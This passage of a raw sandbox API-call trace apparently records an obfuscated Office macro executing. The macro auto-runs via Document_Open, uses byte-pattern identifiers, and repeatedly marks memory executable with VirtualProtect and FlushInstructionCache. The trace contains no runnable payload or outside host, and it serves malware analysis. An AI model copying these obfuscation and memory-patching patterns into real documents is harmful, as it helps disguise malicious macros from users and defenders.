lpflOldProtect=0x19702c*=0x40) returned 1 [0113.849] GetCurrentProcess () returned 0xffffffff [0113.849] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca39, dwSize=0x2) returned 1 [0113.849] GetCurrentProcess () returned 0xffffffff [0113.849] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca58, dwSize=0x14) returned 1 [0113.849] VirtualProtect (in: lpAddress=0xcadca58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0113.853] GetCurrentProcess () returned 0xffffffff [0113.853] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca59, dwSize=0x2) returned 1 [0113.853] GetCurrentProcess () returned 0xffffffff [0113.853] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca78, dwSize=0x14) returned 1 [0113.853] VirtualProtect (in: lpAddress=0xcadca78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0113.853] GetCurrentProcess () returned 0xffffffff [0113.853] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca79, dwSize=0x2) returned 1 [0113.853] GetCurrentProcess () returned 0xffffffff [0113.853] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb0e0, dwSize=0x14) returned 1 [0113.853] VirtualProtect (in: lpAddress=0xcadb0e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0113.854] GetCurrentProcess () returned 0xffffffff [0113.854] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb0e1, dwSize=0x2) returned 1 [0113.854] GetCurrentProcess () returned 0xffffffff [0113.854] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb100, dwSize=0x14) returned 1 [0113.854] VirtualProtect (in: lpAddress=0xcadb100, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0113.855] GetCurrentProcess () returned 0xffffffff [0113.855] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb101, dwSize=0x2) returned 1 [0113.855] GetCurrentProcess () returned 0xffffffff [0113.855] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb120, dwSize=0x14) returned 1 [0113.855] VirtualProtect (in: lpAddress=0xcadb120, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0113.855] GetCurrentProcess () returned 0xffffffff [0113.855] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb121, dwSize=0x2) returned 1 [0113.856] GetAsyncKeyState (vKey=3) returned 0 [0113.856] VarCmp (pvarLeft=0x197a1c, pvarRight=0x197a0c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0113.856] VarCmp (pvarLeft=0x197a1c, pvarRight=0x197a0c, lcid=0x0, dwFlags=0x30001) returned 0x1 [0113.860] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x197c5c | out: ppsaOut=0x197c5c) returned 0x0 [0113.860] SafeArrayAllocData (psa=0xc843150) returned 0x0 [0113.863] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BuiltInDocumentProperties", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0113.863] CRetailMalloc_Alloc () returned 0xc822f20 [0113.863] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BuiltInDocumentProperties", cchWideChar=-1, lpMultiByteStr=0xc822f20, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BuiltInDocumentProperties", lpUsedDefaultChar=0x0) returned 26 [0113.863] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x97\x97\x97\x96\x96\x96\x97\x96\x96\x97\x97\x97\x97\x97\x96\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0113.863] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x97\x97\x96\x96\x96\x96\x97\x96\x96\x97\x96\x96\x96\x97\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0113.863] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0113.863] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x96\x97\x97\x97\x96\x96\x96\x97\x96\x96\x97\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0113.863] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x96\x96\x96\x96\x96\x96\x97\x96\x96\x97\x97\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0113.863] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x96\x96\x96\x97\x96\x97\x96\x96\x96\x97\x96\x96\x97\x96\x96\x96\x96\x97\x97\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0113.863] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x97\x96\x97\x97\x97\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0113.863] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x96\x96\x96\x96\x96\x97\x96\x97\x96\x97\x97\x97\x97\x97\x97\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0113.863] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x96\x97\x97\x96\x96\x97\x97\x97\x96\x97\x97\x96\x96\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0113.863] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x96\x96\x96\x96\x97\x97\x96\x97\x96\x96\x96\x96\x96\x97\x97\x97\x97\x97\x97\x97\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0113.863] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="Document_Open", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 3 [0113.863] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x96\x97\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0113.863] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x97\x96\x96\x96\x97\x97\x97\x96\x96\x97\x96\x96\x97\x97\x96\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0113.863] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x97\x97\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0113.863] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x96\x96\x97\x96\x96\x97\x97\x97\x97\x97\x96\x96\x97\x97\x97\x97\x97\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0113.863] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0113.863] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x97\x97\x96\x96\x97\x96\x97\x96\x97\x97\x96\x96\x97\x96\x97\x97\x97\x97\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0113.863] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x97\x96\x96\x97\x97\x97\x97\x96\x96\x96\x96\x97\x96\x96\x96\x96\x97\x97\x97\x96\x97\x96\x97\x97\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0113.864] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x96\x97\x96\x97\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0113.864] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x96\x96\x97\x97\x96\x96\x96\x97\x96\x96\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0113.864] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x96\x96\x96\x97\x97\x97\x97\x96\x96\x97\x96\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0113.864] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x96\x96\x97\x96\x97\x97\x96\x96\x97\x97\x96\x96\x97\x97\x96\x96\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0113.864] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x97\x96\x96\x97\x96\x96\x96\x97\x97\x97\x96\x96\x96\x96\x96\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0113.864] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x97\x96\x97\x97\x97\x96\x97\x96\x96\x97\x97\x96\x96\x97\x97\x97\x96\x97\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0113.864] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x96\x96\x97\x97\x96\x97\x97\x96\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0113.864] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x96\x96\x96\x96\x97\x97\x97\x97\x96\x96\x96\x96\x97\x96\x96\x96\x96\x97\x97\x96\x97\x97\x97\x97\x97\x96\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0113.864] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x96\x96\x97\x97\x96\x97\x96\x97\x97\x96\x97\x97\x97\x97\x97\x97\x96\x97\x96\x97\x97\x97\x97\x97\x96\x96\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0113.864] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="kxcb_2HlB", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 3 [0113.864] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x97\x96\x96\x96\x97\x96\x96\x96\x97\x97\x96\x96\x96\x97\x97\x96\x97\x96\x97\x96\x96\x96\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0113.864] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x97\x97\x97\x97\x97\x97\x97\x96\x96\x97\x97\x97\x97\x97\x97\x96\x96\x96\x96\x97\x96\x96\x96\x96\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0113.864] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x96\x97\x96\x96\x97\x97\x96\x97\x97\x96\x96\x97\x96\x97\x96\x96\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0113.864] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x96\x97\x97\x97\x96\x97\x96\x97\x97\x96\x96\x96\x97\x96\x96\x96\x96\x96\x96\x97\x96\x96\x97\x97\x97\x97\x96\x96\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0113.864] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x96\x97\x97\x97\x96\x97", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0113.864] CompareStringA (Locale=0x409, dwCmpFlags=0x10001, lpString1="\x97\x96\x96", cchCount1=-1, lpString2="BuiltInDocumentProperties", cchCount2=-1) returned 1 [0113.864] CRetailMalloc_Free () returned 0x1 [0113.864] longjmp () [0113.864] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BuiltInDocumentProperties", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0113.864] CRetailMalloc_Alloc () returned 0xc822d90 [0113.864] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BuiltInDocumentProperties", cchWideChar=-1, lpMultiByteStr=0xc822d90, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BuiltInDocumentProperties", lpUsedDefaultChar=0x0) returned 26 [0113.864] CRetailMalloc_Free () returned 0x1 [0113.864] longjmp () [0114.052] SafeArrayDestroyData (psa=0xc843150) returned 0x0 [0114.052] SafeArrayDestroyDescriptor (psa=0xc843150) returned 0x0 [0114.052] GetAsyncKeyState (vKey=3) returned 0 [0114.113] CRetailMalloc_Alloc () returned 0xcb0eec0 [0114.113] memcpy (in: _Dst=0xb754f48, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0114.113] memcpy (in: _Dst=0xb755050, _Src=0x1978c4, _Size=0xc | out: _Dst=0xb755050) returned 0xb755050 [0114.113] memcpy (in: _Dst=0xb754f48, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0114.114] memcpy (in: _Dst=0xb754f48, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0114.114] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11302dee, cbMultiByte=26, lpWideCharStr=0x1976c4, cchWideChar=27 | out: lpWideCharStr="———–—–—––––—––––——–—––—––") returned 26 [0114.114] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c0542, cbMultiByte=26, lpWideCharStr=0x197724, cchWideChar=27 | out: lpWideCharStr="———–—–—––––—––––——–—––—––") returned 26 [0114.114] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c0542, cbMultiByte=26, lpWideCharStr=0x197724, cchWideChar=27 | out: lpWideCharStr="———–—–—––––—––––——–—––—––") returned 26 [0114.114] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c0542, cbMultiByte=26, lpWideCharStr=0x197724, cchWideChar=27 | out: lpWideCharStr="———–—–—––––—––––——–—––—––") returned 26 [0114.115] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c0542, cbMultiByte=26, lpWideCharStr=0x197724, cchWideChar=27 | out: lpWideCharStr="———–—–—––––—––––——–—––—––") returned 26 [0114.115] CRetailMalloc_Alloc () returned 0xc845060 [0114.115] _mbscpy_s (in: _Dst=0xc845060, _DstSizeInBytes=0x1a, _Src=0x112c0542 | out: _Dst=0xc845060) returned 0x0 [0114.115] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c0bd6, cbMultiByte=33, lpWideCharStr=0x197734, cchWideChar=34 | out: lpWideCharStr="_B_var_———–—–—––––—––––——–—––—––") returned 33 [0114.115] _mbscpy_s (in: _Dst=0x19779c, _DstSizeInBytes=0x1a, _Src=0x112c0542 | out: _Dst=0x19779c) returned 0x0 [0114.115] CRetailMalloc_Free () returned 0x1 [0114.115] memcpy (in: _Dst=0xb755050, _Src=0xb755050, _Size=0xc | out: _Dst=0xb755050) returned 0xb755050 [0114.115] memcpy (in: _Dst=0xb754f48, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0114.115] memcpy (in: _Dst=0xb754f4c, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xb754f4c) returned 0xb754f4c [0114.115] memcpy (in: _Dst=0xb754f48, _Src=0x197714, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0114.115] memcpy (in: _Dst=0xb754f48, _Src=0x197714, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0114.116] memcpy (in: _Dst=0xb754f48, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0114.116] memcpy (in: _Dst=0xb754f48, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0114.116] memcpy (in: _Dst=0xcb0ef38, _Src=0x197944, _Size=0x18 | out: _Dst=0xcb0ef38) returned 0xcb0ef38 [0114.116] CRetailMalloc_Realloc () returned 0xcb0eec0 [0114.116] CRetailMalloc_Free () returned 0x1 [0114.116] GetCurrentProcess () returned 0xffffffff [0114.116] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912074, dwSize=0x14) returned 1 [0114.116] VirtualProtect (in: lpAddress=0xc912074, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0114.117] GetCurrentProcess () returned 0xffffffff [0114.117] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912075, dwSize=0x2) returned 1 [0114.117] GetCurrentProcess () returned 0xffffffff [0114.117] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912094, dwSize=0x14) returned 1 [0114.117] VirtualProtect (in: lpAddress=0xc912094, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0114.117] GetCurrentProcess () returned 0xffffffff [0114.117] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912095, dwSize=0x2) returned 1 [0114.117] GetCurrentProcess () returned 0xffffffff [0114.117] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120b4, dwSize=0x14) returned 1 [0114.117] VirtualProtect (in: lpAddress=0xc9120b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0114.118] GetCurrentProcess () returned 0xffffffff [0114.118] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120b5, dwSize=0x2) returned 1 [0114.118] GetCurrentProcess () returned 0xffffffff [0114.118] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120d4, dwSize=0x14) returned 1 [0114.118] VirtualProtect (in: lpAddress=0xc9120d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0114.118] GetCurrentProcess () returned 0xffffffff [0114.118] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120d5, dwSize=0x2) returned 1 [0114.118] GetCurrentProcess () returned 0xffffffff [0114.118] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120f4, dwSize=0x14) returned 1 [0114.118] VirtualProtect (in: lpAddress=0xc9120f4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0114.119] GetCurrentProcess () returned 0xffffffff [0114.119] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120f5, dwSize=0x2) returned 1 [0114.119] GetCurrentProcess () returned 0xffffffff [0114.119] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912114, dwSize=0x14) returned 1 [0114.119] VirtualProtect (in: lpAddress=0xc912114, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0114.119] GetCurrentProcess () returned 0xffffffff [0114.119] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912115, dwSize=0x2) returned 1 [0114.119] GetCurrentProcess () returned 0xffffffff [0114.119] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912134, dwSize=0x14) returned 1 [0114.119] VirtualProtect (in: lpAddress=0xc912134, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0114.120] GetCurrentProcess () returned 0xffffffff [0114.120] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912135, dwSize=0x2) returned 1 [0114.120] GetCurrentProcess () returned 0xffffffff [0114.120] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912154, dwSize=0x14) returned 1 [0114.120] VirtualProtect (in: lpAddress=0xc912154, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0114.120] GetCurrentProcess () returned 0xffffffff [0114.120] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912155, dwSize=0x2) returned 1 [0114.120] GetCurrentProcess () returned 0xffffffff [0114.120] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912174, dwSize=0x14) returned 1 [0114.120] VirtualProtect (in: lpAddress=0xc912174, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0114.121] GetCurrentProcess () returned 0xffffffff [0114.121] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912175, dwSize=0x2) returned 1 [0114.121] GetCurrentProcess () returned 0xffffffff [0114.121] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912194, dwSize=0x14) returned 1 [0114.121] VirtualProtect (in: lpAddress=0xc912194, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0114.122] GetCurrentProcess () returned 0xffffffff [0114.122] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912195, dwSize=0x2) returned 1 [0114.122] GetCurrentProcess () returned 0xffffffff [0114.122] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121b4, dwSize=0x14) returned 1 [0114.122] VirtualProtect (in: lpAddress=0xc9121b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0114.122] GetCurrentProcess () returned 0xffffffff [0114.122] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121b5, dwSize=0x2) returned 1 [0114.122] GetCurrentProcess () returned 0xffffffff [0114.122] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121d4, dwSize=0x14) returned 1 [0114.122] VirtualProtect (in: lpAddress=0xc9121d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0114.123] GetCurrentProcess () returned 0xffffffff [0114.123] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121d5, dwSize=0x2) returned 1 [0114.123] GetCurrentProcess () returned 0xffffffff [0114.123] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc898, dwSize=0x14) returned 1 [0114.123] VirtualProtect (in: lpAddress=0xcadc898, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0114.123] GetCurrentProcess () returned 0xffffffff [0114.123] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc899, dwSize=0x2) returned 1 [0114.123] GetCurrentProcess () returned 0xffffffff [0114.123] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8b8, dwSize=0x14) returned 1 [0114.123] VirtualProtect (in: lpAddress=0xcadc8b8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0114.124] GetCurrentProcess () returned 0xffffffff [0114.124] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8b9, dwSize=0x2) returned 1 [0114.124] GetCurrentProcess () returned 0xffffffff [0114.124] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8d8, dwSize=0x14) returned 1 [0114.124] VirtualProtect (in: lpAddress=0xcadc8d8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0114.124] GetCurrentProcess () returned 0xffffffff [0114.124] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8d9, dwSize=0x2) returned 1 [0114.124] GetCurrentProcess () returned 0xffffffff [0114.124] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8f8, dwSize=0x14) returned 1 [0114.124] VirtualProtect (in: lpAddress=0xcadc8f8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0114.125] GetCurrentProcess () returned 0xffffffff [0114.125] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8f9, dwSize=0x2) returned 1 [0114.125] GetCurrentProcess () returned 0xffffffff [0114.125] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc918, dwSize=0x14) returned 1 [0114.125] VirtualProtect (in: lpAddress=0xcadc918, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0114.125] GetCurrentProcess () returned 0xffffffff [0114.125] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc919, dwSize=0x2) returned 1 [0114.125] GetCurrentProcess () returned 0xffffffff [0114.125] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc938, dwSize=0x14) returned 1 [0114.125] VirtualProtect (in: lpAddress=0xcadc938, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0114.126] GetCurrentProcess () returned 0xffffffff [0114.126] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc939, dwSize=0x2) returned 1 [0114.126] GetCurrentProcess () returned 0xffffffff [0114.126] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc958, dwSize=0x14) returned 1 [0114.126] VirtualProtect (in: lpAddress=0xcadc958, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0114.126] GetCurrentProcess () returned 0xffffffff [0114.126] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc959, dwSize=0x2) returned 1 [0114.126] GetCurrentProcess () returned 0xffffffff [0114.127] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc978, dwSize=0x14) returned 1 [0114.127] VirtualProtect (in: lpAddress=0xcadc978, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0114.127] GetCurrentProcess () returned 0xffffffff [0114.127] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc979, dwSize=0x2) returned 1 [0114.127] GetCurrentProcess () returned 0xffffffff [0114.127] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc998, dwSize=0x14) returned 1 [0114.127] VirtualProtect (in: lpAddress=0xcadc998, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0114.128] GetCurrentProcess () returned 0xffffffff [0114.128] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc999, dwSize=0x2) returned 1 [0114.128] GetCurrentProcess () returned 0xffffffff [0114.128] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9b8, dwSize=0x14) returned 1 [0114.128] VirtualProtect (in: lpAddress=0xcadc9b8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0114.231] GetCurrentProcess () returned 0xffffffff [0114.231] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9b9, dwSize=0x2) returned 1 [0114.231] GetCurrentProcess () returned 0xffffffff [0114.231] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9d8, dwSize=0x14) returned 1 [0114.231] VirtualProtect (in: lpAddress=0xcadc9d8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0114.233] GetCurrentProcess () returned 0xffffffff [0114.233] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9d9, dwSize=0x2) returned 1 [0114.233] GetCurrentProcess () returned 0xffffffff [0114.233] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9f8, dwSize=0x14) returned 1 [0114.233] VirtualProtect (in: lpAddress=0xcadc9f8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0114.234] GetCurrentProcess () returned 0xffffffff [0114.234] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9f9, dwSize=0x2) returned 1 [0114.234] GetCurrentProcess () returned 0xffffffff [0114.234] FlushInstructionCache 